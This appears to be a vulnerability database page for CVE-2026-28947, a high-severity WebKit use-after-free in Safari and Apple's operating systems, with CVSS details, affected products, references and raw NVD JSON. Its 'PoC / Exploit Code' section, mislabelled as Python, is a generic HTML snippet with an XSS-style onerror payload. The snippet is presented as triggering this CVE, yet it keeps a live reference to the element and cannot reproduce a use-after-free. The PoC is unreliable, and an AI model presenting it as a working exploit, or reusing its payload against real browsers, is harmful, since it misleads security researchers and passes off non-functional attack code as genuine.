CVE-2026-28947

Description

A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26.5, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected Safari crash.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE

Safari < 26.5

iOS < 26.5

iPadOS < 26.5

macOS < 26.5

tvOS < 26.5

visionOS < 26.5

watchOS < 26.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
Conceptual Proof of Concept for CVE-2026-28947 (Use-After-Free)
This PoC demonstrates a generic UAF trigger pattern in WebKit.
-->
<html>
<head>
<title>CVE-2026-28947 PoC</title>
</head>
<body>
<script>
// Create a DOM element
var targetElement = document.createElement('div');
document.body.appendChild(targetElement);

// Function to simulate the UAF condition
function triggerVulnerability() {
    // Step 1: Remove the element, potentially freeing underlying memory
    document.body.removeChild(targetElement);

    // Step 2: Attempt to access the freed object after a delay or event
    // In a real exploit, this memory might be reallocated by a spray
    setTimeout(function() {
        try {
            // Accessing property of freed object to trigger crash
            targetElement.innerHTML = "<img src=x onerror=alert(1)>";
            console.log("If this runs, the object was not freed or reallocated safely.");
        } catch (e) {
            console.log("Exception caught: " + e.message);
        }
    }, 100);
}

// Trigger via interaction (simulating UI:R)
window.onload = function() {
    triggerVulnerability();
};
</script>
<p>CVE-2026-28947 PoC: Check console for results or observe browser crash.</p>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28947
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28947
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28947/
[4] VulDB https://vuldb.com/cve/CVE-2026-28947
[5] https://support.apple.com/en-us/127110
[6] https://support.apple.com/en-us/127115
[7] https://support.apple.com/en-us/127118
[8] https://support.apple.com/en-us/127119
[9] https://support.apple.com/en-us/127120
[10] https://support.apple.com/en-us/127121

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28947", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:18:55.863", "lastModified": "2026-05-13T21:16:43.833", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26.5, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected Safari crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "9D9FC2C4-7A7C-4330-A226-255428A5D18E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "0A70A5FD-8891-4C4E-9D35-F217F95027B5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "6CB91417-90A8-4A9B-A1D0-1D94B80EF837"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "176C47FD-FA25-437B-9061-A81CAA367AEF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "C8F45D80-0DF8-444E-9AF1-703A1075F046"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "057B244F-5485-4108-8E23-FE15F5256EE7"}]}]}], "references": [{"url": "https://support.apple.com/en-us/127110", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127115", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127118", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127119", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127120", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127121", "source": "[email protected]"}]}}